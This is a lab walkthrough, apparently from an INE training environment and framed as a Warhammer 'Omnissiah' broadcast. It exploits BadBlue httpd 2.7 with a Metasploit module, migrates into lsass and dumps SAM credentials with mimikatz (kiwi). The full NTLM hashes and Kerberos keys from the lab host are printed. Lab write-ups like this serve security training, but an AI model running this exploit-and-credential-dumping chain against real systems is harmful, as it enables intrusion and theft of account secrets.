+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
Tools used
Metasploit frameworkNmap
Workflow:
Scanning:
db_nmap -sS -sV -T4 -Pn demo.ine.local -v
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http BadBlue httpd 2.7
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: 5357/tcp open http Microsoft HTTPAPI httpd 2.0 Badblue found running on 80 , metasploit has a module to exploit this.
windows/http/badblue_passthru
We got an administrator meterpreter session on the target machine after this.
After this we load kiwi , which is the mimikatz integration for metasploit , with load kiwi.
And , since the goal of the lab is to dump credentials such as NTLM Hashes and Syskeys we will use it for that.
But , before this we need to migrate process to get a SYSTEM account. For that we’re going to migrate to lsass. After doing this and getting SYSTEM we can get all the information we need by executing:
lsa_dump_sam
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : ed1f5e64aad3727f03522bbddc080d77
* Primary:Kerberos-Newer-Keys *
Default Salt : ATTACKDEFENSEAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f566d48c0c62f88d997e9e56b52eed1696aead09df3100982bcfc5920655da5d
aes128_hmac (4096) : bf0ca9e206e82ce481c818070bef0855
des_cbc_md5 (4096) : 6d570d08df8979fe
OldCredentials
aes256_hmac (4096) : 69d101a02f3f4648bf9875f10c1cd268d3f500c3253ab862222a9e1bb3740247
aes128_hmac (4096) : 3c3fd899f7f004ed44e9e48f868a5ddc
des_cbc_md5 (4096) : 9b808fb9e0cbb3b5
OlderCredentials
aes256_hmac (4096) : 4cbbe8ad8482ca76952b08cd9103ba91af35c9d8b21a3d49c332e072618a9fa9
aes128_hmac (4096) : b18addd75f8a2b106b262c7b5e517623
des_cbc_md5 (4096) : 7fe0c2a15eb32fcd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : ATTACKDEFENSEAdministrator
Credentials
des_cbc_md5 : 6d570d08df8979fe
OldCredentials
des_cbc_md5 : 9b808fb9e0cbb3b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a1528cd40d99e5dfa9fa0809af998696
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227
des_cbc_md5 (4096) : ce9b2cabd55df4ce
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : ce9b2cabd55df4ce
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8e5edf45f3a42335f1f4906a24a08fe
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-R69684Tstudent
Default Iterations : 4096
Credentials
aes256_hmac (4096) : bab064fdaf62216a1577f1d5cd88e162f6962b4a421d199adf4c66b61ec6ac7c
aes128_hmac (4096) : 42bc1d17d1236d3afc09efbeba547d2c
des_cbc_md5 (4096) : 1a975b02a7bf15d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-R69684Tstudent
Credentials
des_cbc_md5 : 1a975b02a7bf15d5GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++